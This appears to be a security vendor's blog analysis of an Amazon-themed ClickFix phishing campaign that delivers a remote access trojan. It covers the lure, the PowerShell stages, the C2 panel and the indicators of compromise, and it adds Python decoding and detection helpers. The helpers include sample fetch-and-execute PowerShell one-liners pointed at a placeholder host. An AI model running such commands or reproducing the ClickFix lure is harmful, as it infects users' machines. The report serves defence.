By: Dylan Main, Cofense Phishing Defense Center
Threat actors do not always need to compromise a major company to weaponize its trust; they simply need to borrow its name. In the campaign described below, cybercriminals combine social engineering, lookalike domains, and fake verification prompts to turn a routine-looking security alert into ClickFix malware delivery, with the goal of convincing recipients to unknowingly infect themselves.
The Cofense Phishing Defense Center has identified an Amazon-themed malware delivery campaign that abuses the ClickFix self-infection technique to deliver a custom monitoring RAT known as HarborWatch Agent. This campaign highlights a growing trend in the threat landscape where attackers are abusing trusted brands and fake verification to turn users into the mechanism of their own infection.
Figure 1: Initial Amazon-themed phishing email
This campaign begins with an Amazon-themed email with the subject “Security alert: Login activity anomaly notification.” The email impersonates Amazon’s security team and claims the recipient’s account has been locked due to “suspicious activity.” This is a common social engineering tactic: fabricated account details, an unfamiliar login location, and timestamps create urgency and pressure the user into believing the account has been accessed without their authorization. These details give the email the appearance of a legitimate security notification while compelling the recipient to act quickly.
Additionally, the threat actor sends from a lookalike address, “no-reply@security[.]amazonassist[.]xyz,” that imitates Amazon’s security team without using an Amazon domain, reinforcing the brand abuse, and presents a prominent “Verify Account Information” button that kicks off the next stage of the attack when clicked.
Figure 2: ClickFix Fake Security Check
After clicking the “Verify Account Information” button, the user is redirected to amazonattention[.]com, where the campaign shifts from brand impersonation to hands-on social engineering. The page looks like a CAPTCHA-style security check that asks the user to follow a few steps before they can be verified as human. Instead of the usual image selection or browser check, however, the page instructs the user to run a command on their own system: open the Windows Run dialog with “Windows Key + R,” paste the command, which the page placed on the clipboard when the user arrived, and press “Enter” to complete “verification.” Although framed as a security check, this is the standard ClickFix pattern, in which the threat actor supplies “verification” steps that turn the user into the infection vehicle.
Figure 3: Clipboard PowerShell Command from ClickFix Verification
The actual command copied to the user’s clipboard is masked by the text “I am not a robot - reCAPTCHA Verification,” so the pasted content appears to be related to the fake verification. This is yet another distraction to hide a dangerous PowerShell command that continues the infection chain. The command launches PowerShell with -nop (no profile) and -w hidden, the latter suppressing the PowerShell window that would otherwise appear on screen; it then decodes a Base64-encoded string into the next command to run.
Figure 4: Base64 Decoded Text
The decoded text shown in Figure 4 is another command that continues the infection by fetching and executing a remote script from amazonalert[.]xyz/download/code[.]txt, abusing a second fake Amazon domain to further the attack.
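The decoding step described above, as an added Python triage helper (not Cofense’s tooling, and not the campaign’s actual command): it peels the Base64 layers off a pasted ClickFix command, extracts any URLs, and lists the traits that mark it as a ClickFix one-liner. Both samples are constructed for this example, and example.invalid stands in for the real stage-two host. The -EncodedCommand form is decoded as UTF-16LE because that is what PowerShell’s -e switch expects, while inline FromBase64String blobs are usually UTF-8, so the helper handles both.

```python
import base64
import binascii
import re

# Constructed samples of ClickFix clipboard payloads (NOT the campaign's commands;
# example.invalid is a placeholder for the real stage-two host).
# Variant 1: -EncodedCommand (UTF-16LE under the Base64), with a trailing comment that
# makes the pasted text look like verification text in the Run dialog.
STAGE2_PLACEHOLDER = "iex (iwr 'https://example.invalid/download/code.txt' -UseBasicParsing)"
SAMPLE_ENCODED = (
    "powershell -nop -w hidden -e "
    + base64.b64encode(STAGE2_PLACEHOLDER.encode("utf-16le")).decode()
    + "  # I am not a robot - reCAPTCHA Verification"
)
# Variant 2: inline [Convert]::FromBase64String(...) decoded to text and handed to iex.
INNER_PLACEHOLDER = "iwr 'https://example.invalid/download/code.txt' | iex"
SAMPLE_INLINE = (
    'powershell -nop -w hidden -c "iex([Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('" + base64.b64encode(INNER_PLACEHOLDER.encode()).decode() + "')))\""
)

ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
INLINE_B64 = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RX = re.compile(r"(?i)\bhttps?://[^\s'\")<>]+")

# Traits a ClickFix one-liner tends to combine; each is weak alone, strong together.
INDICATORS = [
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no profile", re.compile(r"(?i)-nop(?:rofile)?\b")),
    ("base64 stage", re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String")),
    ("in-memory execution", re.compile(r"(?i)\biex\b|Invoke-Expression")),
    ("remote download", re.compile(r"(?i)\biwr\b|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient")),
    ("verification-themed comment", re.compile(r"(?i)#.*(?:robot|captcha|verif)")),
]


def _to_text(raw: bytes, hint: str) -> str:
    """Decode a blob as UTF-16LE (required by -EncodedCommand) or UTF-8.
    Inline blobs are usually UTF-8; a NUL in the second byte means UTF-16LE ASCII."""
    if hint == "utf-16le" or raw[1:2] == b"\x00":
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _find_blobs(text: str):
    for m in ENCODED_FLAG.finditer(text):
        yield m.group(1), "utf-16le"
    for m in INLINE_B64.finditer(text):
        yield m.group(1), "utf-8"


def decode_clipboard_command(cmd: str, max_layers: int = 5) -> dict:
    """Peel Base64 layers off a pasted PowerShell command and summarise what it does."""
    layers, pending = [], [cmd]
    while pending and len(layers) < max_layers:
        text = pending.pop(0)
        for blob, hint in _find_blobs(text):
            try:
                decoded = _to_text(base64.b64decode(blob, validate=True), hint)
            except (binascii.Error, ValueError):
                continue             # not real Base64 (e.g. a long word after a flag)
            layers.append(decoded)
            pending.append(decoded)  # a decoded stage may carry another blob
    everything = "\n".join([cmd, *layers])
    return {
        "layers": layers,
        "urls": sorted(set(URL_RX.findall(everything))),
        "indicators": [name for name, rx in INDICATORS if rx.search(everything)],
    }


if __name__ == "__main__":
    for sample in (SAMPLE_ENCODED, SAMPLE_INLINE):
        report = decode_clipboard_command(sample)
        print("layers:", report["layers"])
        print("urls:", report["urls"])
        print("indicators:", report["indicators"])
```

In practice the input comes from the Run dialog MRU (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) or the command line recorded in a process-creation event; the extracted URLs are what you block and hunt on, and a hit on four or more indicators at once is a reliable ClickFix signal.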
Figure 5: Second-stage PowerShell Script
The downloaded file, code.txt, contains one more PowerShell script, this time leading to the final stage of the attack. The script downloads an executable named “mysql.exe” from hxxps://zoomupdate[.]b-cdn[.]net/mysql[.]exe and stores it in the user’s AppData\Local\Temp folder. Temp is a common drop location in malware delivery because it is writable by any user, rarely inspected, and full of short-lived files, which helps a staged download blend in.
Figure 6: Analysis View of Threat Chain
Once downloaded, the file is executed with the argument “--pass=JHSgfsa2652.” This is key because the argument appears to be required: in the PDC’s analysis, the file simply does not run without it, so a sandbox or analyst that executes the sample without the exact argument never reaches the final payload. This is most likely an anti-analysis measure. If the script succeeds it prints “Success,” presumably to round off the fake security verification for the user.
Figure 7: Harbor Watch Agent Memory Analysis
Analysis of the running mysql.exe process revealed several indicators that led the Cofense Phishing Defense Center to track this threat as HarborWatch Agent. During dynamic analysis, the process made repeated network connections to hxxp://185[.]193[.]127[.]44, identified as the command and control server the threat actors use to issue commands and receive system information. Network analysis confirmed that the malware uses API endpoints such as /api/agent/tasks/ and /api/heartbeat to retrieve commands and report system information. Memory analysis showed repeated references to HarborWatchAgent/c-1.1.1, a clear identifier for the main agent in this campaign. The agent collects system details including operating system version, architecture, hostname, CPU count, disk usage, memory usage, uptime, process count, and network status before reporting back to the command and control server.
Figure 8: Chinese language Harbor Sentinel Admin Panel
Further analysis of the C2 infrastructure revealed that 185[.]193[.]127[.]44 served an administrator login panel when accessed in a browser. The panel is in Chinese and branded 港湾哨兵, which browser translation renders as roughly “Harbor Sentinel” or “Harbor Sentry.”
The translated page tells the administrator that, after logging in, they can access asset monitoring, real-time status updates, and client details. This matches what was observed in the HarborWatch Agent payload, which collects host asset information, checks in with the C2 server, and retrieves tasks via /api/agent/tasks/claim. The pairing of the HarborWatch Agent payload with the Harbor Sentinel panel suggests that the former is the implant that runs on the victim and the latter is the threat actor’s web-based console for monitoring it.
Based on the available analysis and identified artifacts, the Cofense Phishing Defense Center tracks this campaign as delivering a custom remote access trojan, HarborWatch Agent, whose C2 web interface, branded Harbor Sentinel, is the threat actors’ tool for monitoring infected systems.
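As an added example, not Cofense’s detection content, the following Python triage applies the chain’s observable artifacts to constructed endpoint and proxy telemetry: a hidden, Base64-staged PowerShell whose parent is explorer.exe (which is how a Win+R launch appears in process telemetry), an executable started by PowerShell from the user’s AppData\Local\Temp with the --pass= argument, and HTTP requests to the /api/heartbeat and /api/agent/tasks paths or to the published C2 address. Treating HarborWatchAgent/ as an HTTP User-Agent is an assumption made for this example; the report only saw the string in memory, so the rule requires a second corroborating signal and downgrades a bare path match on an internal host to low severity. The --pass value and user name in the sample events are placeholders.

```python
import ipaddress
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Indicators taken from the report: the C2 address and the API paths seen on the wire.
KNOWN_C2_IPS = {"185.193.127.44"}
C2_PATH_PREFIXES = ("/api/heartbeat", "/api/agent/tasks")
# Seen in process memory; treating it as an HTTP User-Agent is an assumption for this
# example, so it is only one of several corroborating signals below.
AGENT_STRING = "HarborWatchAgent/"

HIDDEN_RX = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
STAGED_RX = re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|FromBase64String|\biex\b|Invoke-Expression")

# Constructed telemetry (not real logs): a benign baseline interleaved with the chain.
PROCESS_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\explorer.exe",                      # admin typing powershell into Run
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell"},
    {"parent": r"C:\Windows\explorer.exe",                      # the ClickFix paste
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -e SQBFAFgAIACoAC4ALgAuACkA  # I am not a robot"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\mysql.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\mysql.exe --pass=PLACEHOLDER"},
    {"parent": r"C:\Program Files\MySQL\bin\mysqld.exe",        # the real MySQL client
     "image": r"C:\Program Files\MySQL\bin\mysql.exe", "cmdline": "mysql.exe -u root"},
]
HTTP_EVENTS = [
    {"dst": "142.250.80.46", "host": "www.google.com", "path": "/", "ua": "Mozilla/5.0"},
    {"dst": "185.193.127.44", "host": "185.193.127.44", "path": "/api/heartbeat",
     "ua": "HarborWatchAgent/c-1.1.1"},
    {"dst": "10.0.5.20", "host": "intranet.example", "path": "/api/agent/tasks/claim",
     "ua": "curl/8.0"},                                         # generic path, internal host
]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    evidence: str


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _in_user_temp(path: str) -> bool:
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return any(parts[i:i + 3] == ["appdata", "local", "temp"] for i in range(len(parts) - 2))


def _bare_public_ip(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def check_process(ev: dict) -> list:
    found = []
    parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"]
    # Run-dialog launches are children of explorer.exe; a hidden, staged PowerShell from
    # there is the ClickFix signature (nobody types -w hidden -e <blob> by hand).
    if (parent == "explorer.exe" and image in ("powershell.exe", "pwsh.exe")
            and HIDDEN_RX.search(cmd) and STAGED_RX.search(cmd)):
        found.append(Finding("clickfix_launch", "high", cmd))
    # PowerShell starting a fresh executable out of %LOCALAPPDATA%\Temp; this
    # campaign's --pass= gate raises the severity.
    if parent in ("powershell.exe", "pwsh.exe") and _in_user_temp(ev["image"]):
        found.append(Finding("temp_drop_exec", "high" if "--pass=" in cmd else "medium", cmd))
    return found


def check_http(ev: dict) -> list:
    found = []
    if ev["dst"] in KNOWN_C2_IPS:
        found.append(Finding("known_c2_ip", "high", ev["dst"]))
    if ev["path"].startswith(C2_PATH_PREFIXES):
        corroborated = (ev["dst"] in KNOWN_C2_IPS or AGENT_STRING in ev["ua"]
                        or _bare_public_ip(ev["host"]))
        # /api/heartbeat-style paths are generic; alone they merit only a low-severity note.
        found.append(Finding("harborwatch_beacon" if corroborated else "generic_agent_path",
                             "high" if corroborated else "low",
                             f'{ev["host"]}{ev["path"]} ua={ev["ua"]}'))
    return found


def triage(process_events, http_events) -> list:
    findings = []
    for ev in process_events:
        findings.extend(check_process(ev))
    for ev in http_events:
        findings.extend(check_http(ev))
    return findings


if __name__ == "__main__":
    for f in triage(PROCESS_EVENTS, HTTP_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

The process rules need command-line logging (Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled), and the beacon rule needs proxy or NetFlow data that records the request path; without the path, fall back to the known C2 address and to direct-to-IP HTTP from a freshly dropped binary.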
Overall, this campaign highlights the continued effort of threat actors to create and distribute new infection methods to compromise, steal from, and exploit user systems. By combining brand abuse, fake verification, and ClickFix-style social engineering, these threat actors bypass traditional attachment delivery and instead lure victims into infecting themselves. Because the initial execution comes from the user’s own keystrokes rather than from an attachment a mail gateway can scan, this self-infection tactic can delay detection, especially when it is disguised as routine verification.
As campaigns like this continue to evolve, organizations need solutions purpose-built to detect and stop phishing threats that evade traditional defenses. Cofense combines phishing-specific AI, trained on real-world attacks, with expert human validation to deliver accurate post-perimeter detection and response, helping strengthen organizational resilience against today's most sophisticated email threats. Request a demo today to learn more.
Email IOCs:
Stage 1 – Observed Email Infection URL | Infection URL IP(s)
hxxps://amazonattention[.]com/verify | 172.67.190.89
Stage 2 – Discovered Malicious File(s):
File Name | MD5 | SHA256 | File Size
Clipboard.ps1 | 9abebe5a34eefb80db12bf8d51bfe7f7 | 5f7bb80bf85c1fae7413eb534cc2f022402c8753f75666525adb1dc85a677f4c | 304 bytes
code.txt | 09c121225fe254676a27c21943506714 | cf94ff2ecc4f3157704c9cfed5e446c405e7729141019045cb05ef6ffad122d5 | 397 bytes
mysql.exe | 33760b2aa86deea5805e647197c34ef5 | 3a87cab1e8c6868a7939eb422f1851ecc746405cda6b3d3502b9d8eedc360898 | 203264 bytes
Stage 2 – Observed Payload URL(s) | Payload IP(s)
hxxps://amazonalert[.]xyz/download/code[.]txt | 172.67.189.76
Stage 2 – Observed Command & Control URL(s) | Command & Control IP(s)
hxxp://185[.]193[.]127[.]44 | 185.193.127.44
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.